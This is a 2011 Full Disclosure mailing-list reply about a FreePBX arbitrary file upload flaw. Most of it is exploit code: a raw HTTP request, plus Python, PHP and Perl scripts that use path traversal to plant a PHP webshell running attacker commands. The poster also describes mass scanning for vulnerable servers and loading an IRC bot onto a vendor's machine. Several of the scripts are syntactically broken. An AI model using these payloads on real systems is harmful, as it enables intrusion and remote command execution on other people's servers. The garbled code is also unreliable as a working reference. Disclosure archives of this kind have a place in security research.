Full Disclosure mailing list archives
Re: FreePBX - Module Administration Arbitrary File Upload
From: "-= Glowing Doom =-" <secn3t () gmail com>
Date: Sun, 12 Jun 2011 09:51:53 +1000
hello, In regards to this FreePBX exploit, wich i PoC'd, has anyone tried to use the PoC ? If so, were you able to just axcs the folder,with OUT the admin privs. Im just abit confused, because the poc i did seems to have same prpblem,altho, can apparently access the webshell, using the method described in the older PoC (wich was only a month ago or so now)... The Team who released the 'admin only' PoC, did not seem to do much about showing theyre request session header details, so, i cannot see what they are reporting here :s this PoC , i found about 1mth ago, was just the session info, and header data, the person who asked me to look into it more, told me it was 'working' with NO admin privs, you just have to add the line in, wich points to YOUR own /folder/ , wich, can be done thru manipulating the header data,and config.php of the actual freepbx. i also did a 'sweep' scan, on one range alone, i foubndapprox 400-500 of this FreePBX,all linux... On another note, I just found a MASSIVE RFI/RCE in almost EVERY torrent site availabkle, actually, was a priv one, i just do not know wether to help the admin, because last time i did this ( bur.st networking, reported 4 PoC's to them, was also a donating user) , they BANNED me for explaining it... Is it safer to post to this list ? Or, contact the vendor :s It seems that when you contact vendors, another case, was a he.net box,wich STILL is vulnerable, the he.net admin said to me the code was 'meant to be that way', and allowed remote injection of a shell.. I tried to explain this, and they said again, was normal and not a problem, however, then loaded as simple php bot, and made it join irc, then started the PID about 20 times, the admin finally looked into it, BUT, i was not thanked, not even close... lol, infact, suspicion again.. this has now happened to me, about 5 times, starting from bsd-secteam in early 2000's, about a cat command issue, wich allowed me to replace master.;pass file... even then, i had problems explaining to Colin Percival about it, he could not 'see' my PoC... yet, it seems that he has patched it :s this wa also a problem in gentoo, and about 3 other distros, i could bring that up even , and, yes, 'cat' command, i think because it was so simple, it was unbelievable to them... I am very confused about how/what/whop to now contact, and im sitting on 3 MS exploits, one of wich, attacks theyre patches!! i dont know what todo!! please offer me any advice... Also, please look into this seperate PoC for freepbx, as it apparently is working, altho , i do not TRY to make peoples websites screwed etc,i am happy to do a Poc but, i dont run local webserver at moment, am in the midst of changing raqs over.. I am just after some help in regards to this. Cheers, xd / dru On 10 June 2011 09:08, -= Glowing Doom =- <secn3t () gmail com> wrote:
ehhhh .... php exploit code has a small bugs in it :P sorry... i just woke and should have looked... just look at part1 and part2 :) it is pretty simple to fix... also when uploading, you create your own /folder/ , using this method anyhow.. On 10 June 2011 08:59, -= Glowing Doom =- <secn3t () gmail com> wrote:Hello... I wrote a PoC code, for similar bug in this application, about 3months ago... unfortunately, i did not bother to put it on here because well, it was nothing much.. but since this 'admin' module has appeared, i will add my codes to the thing...: this needs for PBX to 'record' ,notsure if an admin module is needed..it seems to ONLY look for the recordings... anyhow have fun.. admin i believe :)... nice try to find the sploit guys, i have only posted it on my blogs and pastebin about 400times in the past 4months... i guess i will put it here next time.. here is some codes for you..: ------------------------------------------------------------------------------------------------------- PoC The HTTP request below illustrates the upload of a phpshell:: POST /admin/config.php HTTP/1.1 Host: 10.10.1.3 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://10.10.1.3/admin/config.php Cookie: ARI=cookieValue; PHPSESSID=cookieValue Authorization: Basic base64auth Content-Type: multipart/form-data; boundary=---------------------------5991806838789183981588991120 Content-Length: 116089 -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="display" recordings -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="action" recordings_start -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="usersnum" ../../../../../var/www/html/admin/SpiderLabs -----------------------------5991806838789183981588991120 Content-Disposition: form-data; name="ivrfile"; filename="webshell.php" Content-Type: application/octet-stream <?php /* WebShell code goes here */ ?> -----------------------------5991806838789183981588991120-- OK SO... In python form: #!/usr/bin/env python import urllib, re, os, httplib, urllib2, time, socket, getopt, sys host = $host port = 80 s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n') s.connectHTTP((host,port)) s.send( 'POST /admin/config.php HTTP/1.1\r\n' 'Host: ' + host + '\r\n' 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n' 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n' 'Accept-Language: en-us,en;q=0.5\r\n' 'Accept-Encoding: gzip,deflate\r\n' 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n' 'Keep-Alive: 300\r\n' 'Proxy-Connection: keep-alive\r\n' 'Referer: http://' + host + '/admin/config.php\r\n' 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n' 'Authorization: Basic base64auth\r\n') 'Content-Type: multipart/form-data;\r\n' 'boundary=---------------------------5991806838789183981588991120\r\n' 'Content-Type: multipart/form-data;\r\n' 'boundary=---------------------------5991806838789183981588991120\r\n' 'Content-Length: 116089\r\n' '\r\n' '-----------------------------5991806838789183981588991120\r\n' 'Content-Disposition: form-data; name="display"\r\n' '\r\n' 'recordings\r\n' '-----------------------------5991806838789183981588991120\r\n' 'Content-Disposition: form-data; name="action"\r\n' '\r\n' 'recordings_start\r\n' '-----------------------------5991806838789183981588991120\r\n' 'Content-Disposition: form-data; name="usersnum"\r\n' '\r\n' '../../../../../var/www/html/admin/zmeu.php\r\n' '-----------------------------5991806838789183981588991120\r\n' 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n' 'Content-Type: application/octet-stream\r\n' '\r\n' '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n' '-----------------------------5991806838789183981588991120--\r\n' and... IN php: <?php echo "\n\n"; echo "+-------------------------------------------------------------------------+\r\n"; echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n"; echo "| Usage: php exploit.php site.com |\r\n"; echo "+-------------------------------------------------------------------------+\r\n"; echo "\n"; echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n"; $code = trim(fgets(STDIN)); $socket = @fsockopen($argv[1], 80, $eno, $estr, 10); if(!$socket) { die("[-] Couldnt connect to: ".$argv[1].". Operation aborted."); } $part1 = "POST /admin/config.php HTTP/1.1\r\n"; $part1 .= "Host: " . $argv[1] . "\r\n"; $part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\r\n"; $part1 .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $part1 .= "Accept-Language: en-us,en;q=0.5\r\n"; $part1 .= "Accept-Encoding: gzip,deflate\r\n"; $part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $part1 .= "Connection: keep-alive\r\n"; $part1 .= "Keep-Alive: 300\r\n"; $part1 .= "Proxy-Connection: keep-alive\r\n"; $part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";; $part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n"; $part1 .= "Authorization: Basic base64auth\r\n"; $part1 .= "Content-Type : multipart/form-data;\r\n"; $part2 = "boundary=-----------------------------5991806838789183981588991120--\r\n"; $part1 .= "Content-Type : multipart/form-data;\r\n"; $part2 = "boundary=-----------------------------5991806838789183981588991120--\r\n"; $part2 = "Content-Length: 116089\r\n"; $part2 .= "\r\n"; $part2 .= "-----------------------------5991806838789183981588991120\r\n"; $part2 .= "Content-Disposition: form-data; name=\"display\"\r\n"; $part2 .= "\r\n"; $part2 .= "recordings\r\n"; $part2 .= "---------------------------5991806838789183981588991120\r\n"; $part2 .= "Content-Disposition: form-data; name=\"action\"\r\n"; $part2 .= "\r\n"; $part2 .= "recordings_start\r\n"; $part2 .= "---------------------------5991806838789183981588991120\r\n"; $part2 .= "Content-Disposition: form-data; name=\"usersnum\"\r\n"; $part2 .= "\r\n"; $part2 .= "Content-Disposition: form-data; name=\"../../../../../var/www/html/admin/xd\"\r\n"; $part2 .= "---------------------------5991806838789183981588991120\r\n"; $part2 .= "Content-Disposition: form-data; name=\"ivrfile\"; filename=\"shell.php\"\r\n"; $part2 .= "Content-Type: application/octet-stream\r\n"; $part2 .= "\r\n"; $part2 .= "<?php echo \'<pre>\' + system(\'$code\') + \'</pre>\'; ?>\r\n"; $part2 .= "-----------------------------5991806838789183981588991120--\r\n"; $part1 .= $part2; fwrite($socket, $part1); echo "[!] Check the upload folder (/var/www/html/admin/xd) .."; } else { echo "\n\n"; echo "+---------------------------------------------------+\r\n"; echo "| Usage: php exploit.php site.com |\r\n"; echo "+---------------------------------------------------+\r\n"; echo "\n\n"; } ?> and in perl.. #!/usr/bin/perl use IO::Socket::INET; use Crypt::SSLeay; use Net::SSL; sub usage { print "perl $0 <Host> <Cmd>\n"; exit(1); } my($host, $cmd) = @ARGV or usage(); print "[+] Connecting to host...\n"; my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort => 80,Timeout => 10) or die "[-] Connect error..\n"; if(!sock) { print "[-] Non-SSL PBX NOT HERE!\n"; exit(-1); else { $sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort => 443,Timeout => 10) or die "[-] Connect error..\n"; print "[-] SSL PBX NOT HERE!\n"; exit(-1); } print "[+] Connected.. Sending Buffer\n"; my $temp= "POST /admin/config.php HTTP/1.1\n". "Host: $host:80/\n". "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n". "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n". "Accept-Language: en-us,en;q=0.5\n". "Accept-Encoding: gzip,deflate\n". "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n". "Keep-Alive: 300\n". "Proxy-Connection: keep-alive\n". "Referer: http://$host/admin/config.php\n";. "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n". "Authorization: Basic base64auth\n". "Connection: keep-alive\n". "Content-Type : multipart/form-data;\n". "---------------------------5991806838789183981588991120\n". "Content-Length: 116089\n". "\n". "Content-Disposition: form-data; name=\"display\"\n". "recordings\n". "\n". "---------------------------5991806838789183981588991120\n". "Content-Disposition: form-data; name=\"action\"\n". "recordings_start\n". "\n". "---------------------------5991806838789183981588991120\n". "Content-Disposition: form-data; name=\"usersnum\"\n". "\n". "---------------------------5991806838789183981588991120\n". "Content-Disposition: form-data; name=\"../../../../../var/www/html/admin/xd\"\n". "Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n". "Content-Type: application/octet-stream\n". "\n". "<?php ". $cmd ." ?>\n". "-----------------------------5991806838789183981588991120--\n\n"; print "[+] Sent file 'shell.php' to act as webshell ..\n"; my $buffer_size=length($temp); $temp; my $answer=0; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock) { print "[+] Buffer sent..running command: $cmd ..\n"; while ($answer=<$sock>) { print $answer; print results "[!] Server reply: $answer ..\n"; } } } have fun! Perl one is abit rough.. dru xd @ #haxNET @ Efnet (National LULZ day is here!) And for those guys who 'exploited' it... this PoC was released like 3months ago... what the hell are yu guiys on about, and where is even a HEADER showing explotation :S seems you have started a group but forgot to check this for previous bugs :) hehe... nomatter, it is now debugged for you.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- FreePBX - Module Administration Arbitrary File Upload Tiago Ferreira (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload Tyler Borland (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload Tiago Ferreira (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload -= Glowing Doom =- (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload -= Glowing Doom =- (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload -= Glowing Doom =- (Jun 11)
- Re: FreePBX - Module Administration Arbitrary File Upload Tiago Ferreira (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload Tyler Borland (Jun 09)